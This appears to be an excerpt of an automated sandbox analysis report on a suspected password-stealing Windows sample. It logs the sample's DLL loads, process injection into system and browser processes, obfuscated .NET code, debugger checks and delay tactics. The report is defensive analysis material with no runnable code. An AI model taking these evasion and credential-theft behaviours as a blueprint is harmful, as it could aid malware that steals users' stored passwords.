Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: indent PWS-020199.exe, Form1.cs	.Net Code: InitializeComponent
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.cs	.Net Code: wHpy2kyWQL System.Reflection.Assembly.Load(byte[])
Source: 7.2.netiougc.exe.402cd08.2.raw.unpack, Form1.cs	.Net Code: InitializeComponent
Source: 8.2.lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe.328cd08.1.raw.unpack, Form1.cs	.Net Code: InitializeComponent
Source: 8.0.lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe.328cd08.1.raw.unpack, Form1.cs	.Net Code: InitializeComponent
Source: 10.2.firefox.exe.21fcd08.0.raw.unpack, Form1.cs	.Net Code: InitializeComponent

Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0040183A push ebp; ret	2_2_00401848
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_004020D4 push ss; ret	2_2_004020E0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00418240 push FFFFFFAAh; retf	2_2_0041824C
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_004032C0 push eax; ret	2_2_004032C2
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00404BF7 push cs; retf	2_2_00404C04
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0041A393 push ss; iretd	2_2_0041A497
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0040CBA0 push es; retf	2_2_0040CBA9
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00401C71 push ebp; ret	2_2_00401C8A
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0040D425 push eax; iretd	2_2_0040D427
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0041A4D6 push ebp; retf	2_2_0041A553
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0041A4E3 push ebp; retf	2_2_0041A553
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0041A489 push ss; iretd	2_2_0041A497
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0041A546 push ebp; retf	2_2_0041A553
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00417DAD push eax; ret	2_2_00417DB6
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00401647 push ebp; ret	2_2_00401648
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00417EB3 push eax; iretd	2_2_00417EB4
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0040CF9F push eax; ret	2_2_0040CFEF
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00417FA0 push eax; ret	2_2_00417FA5
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0148225F pushad ; ret	2_2_014827F9
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014827FA pushad ; ret	2_2_014827F9
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014B09AD push ecx; mov dword ptr [esp], ecx	2_2_014B09B6
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0148283D push eax; iretd	2_2_01482858
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0148135E push eax; iretd	2_2_01481369
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039E09AD push ecx; mov dword ptr [esp], ecx	7_2_039E09B6
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03224BF0 push eax; iretd	7_2_03224BF1
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03224AEA push eax; ret	7_2_03224AF3
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03224F7D push FFFFFFAAh; retf	7_2_03224F89
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03232F50 push es; retf	7_2_03232F83
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_0322AF9E push edx; iretd	7_2_0322AFAD
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03224CDD push eax; ret	7_2_03224CE2
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03227220 push ebp; retf	7_2_03227290

Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, TRPo2wBCYPfKutFuFS.cs	High entropy of concatenated method names: 'wGdKU0Vyod', 'X7wKdGHFIv', 'AOCK42TKBs', 'XxeKF4nnfA', 'SnGKOoeqA7', 'LmkKMHbZty', 'k3hKwJCRQK', 'dLxKAAJ3lN', 'E84KrppEHB', 'uHFKk0cwKg'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xUdoI5QQOPp2AHoaxG.cs	High entropy of concatenated method names: 'SPXEs1nQn3', 'h83E7qpbub', 'NdbEj9K5Dq', 'Fa0ETJFvaU', 'RGAEOGCkRT', 'KOEEMI0wFQ', 'f46wrIG7Hvfus56hWQ', 'G4SItbPsFQuAe8On6U', 'IwdEEKCf4g', 'kEfEpqGe4y'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, oUGQ5e0Ew7Jp6LNjw7.cs	High entropy of concatenated method names: 'DNbZgYrNWx', 'RgeZGKZpj9', 'NuuZuX4vM8', 'VikZsQIRPB', 'wfjZ7jPoGW', 'xUiucVoTV0', 'qLmuIeRqfG', 'VBjuXuKQl2', 'M2YuqTgPj3', 'dXyuQjEsLR'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, z6XjBRPtbTRZOdnrBM6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 's95kLmhbiG', 'a8ckJv6uXw', 'E7oklSGf8c', 'lHIkvdysGu', 'zATkc3S9NQ', 'AARkI00MER', 'PlskXTDRAw'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, kZcXbVPIw1Zn6RfNW6s.cs	High entropy of concatenated method names: 'rhYrh5ydZJ', 'yRyrbRB28J', 'oEIr2I0X6X', 'jg5rUKpauG', 'MlGr3kU7uo', 'Fsardw5JB8', 'W9rrBh0Nt1', 'evlr4fXWhy', 'ud5rFfQS1k', 'Grcr5I5rnH'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, uRtvZ7KOiw6njkygik.cs	High entropy of concatenated method names: 'zkXo4FNTon', 'tLgoFoSTSe', 'C7CoawrJRx', 'hL5oiCh9jR', 'BTOo0jXHJG', 'nsvoC5N4Mi', 'FLloS681hJ', 'etmofQU1Ss', 'Hllo8EdYGX', 'iEGoNb3vQU'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, a1HGTdPPnnu21Q9w4AJ.cs	High entropy of concatenated method names: 'ToString', 'cbgkpECEvi', 'yDQkyp0dWO', 'W3gkgX5cGW', 'y7ok1lSV89', 'YjakGPHGIy', 'FFEkKj1Ot9', 'vaCkuUvZEb', 'jxdAQaiTspehurA85rs', 'MUlYfmimKI2Ai3mWRde'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, te5SHnzAd3hBY88q4A.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 's6BroUUqMe', 'PMXrOLuuwb', 'qB2rMZSCTk', 'kfarwwdWc3', 'GOQrAuRfmE', 'zxvrr6ZyqU', 'okWrk8DyIF'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, qE8I3ju4oDTZHje92X.cs	High entropy of concatenated method names: 'uqJO8hhp5c', 'iWdOH6tm1d', 'bXfOLm8UJc', 'f1iOJnpCAT', 'hVxOi6a9VF', 'MIlOm4ZEad', 'lwEO0701sy', 'PWiOCWhkQL', 'xtSO6W2W6O', 'zBPOSuMTjJ'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, WVQI0tJtK8th22NnfE.cs	High entropy of concatenated method names: 'Dispose', 'GK8EQEG7ne', 'mWlYiHxNW3', 'sZgPPRbJ7t', 'TJ6E9XAiHZ', 'U6QEzmdw6j', 'ProcessDialogKey', 't7RYDiU8Tp', 'HyEYEFPrah', 'MfuYYCXsw5'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.cs	High entropy of concatenated method names: 'cuepg3LgHJ', 'Rn5p1UagS9', 'JF9pGUXGaV', 'AeUpKP62Zo', 'bWZpuLQFyY', 'jVBpZYbdFw', 'eNCpsXAImW', 'CsAp78phdH', 'pDjptWnK9q', 'erCpjWL9de'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, vOKSoOb1PxLDCtSJ1V.cs	High entropy of concatenated method names: 'pnHAa4UoFY', 'tAHAiWMLyA', 'A3rAmrb6pw', 'rJEA0UGiDj', 'rFvAL1fNw1', 'y2PACTyX09', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, aNGB1Sr6aGUuEYu12d.cs	High entropy of concatenated method names: 'FAqGLAurfT', 'XD4GJvcbnF', 'MMsGl56nBT', 'dAuGvMIZJ1', 'E2DGcdsJDI', 'DqmGIxTQN7', 'LxDGXaVS4P', 'RiUGqcHlcp', 'ANeGQOhn81', 'I4yG9TEZK1'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, LwKIDL50g1puPD1nh8.cs	High entropy of concatenated method names: 'nwbA1aNLMN', 'Y61AGCabGr', 'N25AKFf9XW', 'qQQAuY052Y', 'fxZAZCYCUf', 'KtoAsgPSPZ', 'ElTA77VMRQ', 'aSOAtxbOmo', 'HYiAj1674B', 'tM1ATxHiwv'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, wJJGOwYdKbSmQA13Wr.cs	High entropy of concatenated method names: 'JCqwqtEevf', 'twww9WY2XD', 'IDLAD9bOei', 'RT0AEPV3WK', 'f4FwNWkCfT', 'yhnwHt7mEk', 'N9rwWhTi7F', 'ScZwLdigKL', 'nVHwJPR5G1', 'NYCwlnOZpb'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, iR6tAtsgCB0s6FK2ok.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EbyYQqHuKJ', 'wZcY9LofV2', 'BspYzHeOvi', 'zvxpDhRdAW', 'tfGpE7BA7X', 'yw5pYKlKUs', 'V1epppZxfg', 'PEXXa6zPGJDgBwgLfk'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, bMPrPffQ9OiSRGiWPT.cs	High entropy of concatenated method names: 'Mkys1n8bPh', 'f42sKt9yGN', 'sQEsZlqxuT', 'dHkZ9Lpa1E', 'c7JZzwgFiv', 'jjfsDER1wR', 'uZgsEmO7EV', 'tDQsY4j9LG', 'AcRspngvsj', 'TlQsygp7fh'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, WTZTT21bY9pi5y4yFY.cs	High entropy of concatenated method names: 'fJL2IGqrm', 'xXKUmHFNK', 'cNrdYW0sG', 'EEdBGpdHs', 'dH5FAx408', 'NuA5W64O5', 'QRSifEsxPhQ59SBFx6', 'FhlNtpcPcJN63rpKfm', 'SrjAtWEPj', 'k0skxk1lg'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, f8fMwD31ixQMxE585f.cs	High entropy of concatenated method names: 'ToString', 'ATaMN6uIVt', 'Wr5MimOZRQ', 'cHcMmCjno1', 'ulJM09xpPx', 'PROMCeTeBv', 'Px4M6b4oJo', 'EJoMSwRBfF', 'BPgMfTfXTT', 'YZIMns7qfb'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, K6opXMcVRSp2cGSA44.cs	High entropy of concatenated method names: 'fpwshaRTpo', 'MfLsb46Odv', 'iNHs2JE8qO', 'zIwsUawuMe', 'SvUs38BMbT', 'R7jsdHwXCn', 'GI8sBmNrDk', 'FI0s4g7EyK', 'amZsFVV7je', 'fhgs5pBMVb'
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, fPtj7h4VVYYJfdoUsx.cs	High entropy of concatenated method names: 'mecrEBMGLO', 'kPYrptxieD', 'CUhry2llCj', 'I8Vr1dKUaL', 'tnErGgx0bO', 'RWRruCq6TH', 'QuNrZwaTG5', 'qUEAX3UVoh', 'D2KAqOqEMu', 'O38AQj7Y8E'

Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\netiougc.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\netiougc.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\netiougc.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\netiougc.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\netiougc.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\netiougc.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\netiougc.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\netiougc.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\indent PWS-020199.exe	Memory allocated: 1A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Memory allocated: 3450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Memory allocated: 3310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Memory allocated: B680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Memory allocated: 7AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Memory allocated: B680000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\indent PWS-020199.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netiougc.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\indent PWS-020199.exe TID: 7480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052	Thread sleep count: 191 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052	Thread sleep time: -382000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052	Thread sleep count: 9781 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe TID: 8052	Thread sleep time: -19562000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe TID: 8064	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netiougc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netiougc.exe	Last function: Thread delayed

Source: netiougc.exe, 00000007.00000002.2904358299.000000000330E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc(K
Source: indent PWS-020199.exe, 00000000.00000002.1684045855.0000000007A20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: D2KAqOqEMu
Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2905062970.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2313158392.00000175C218C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
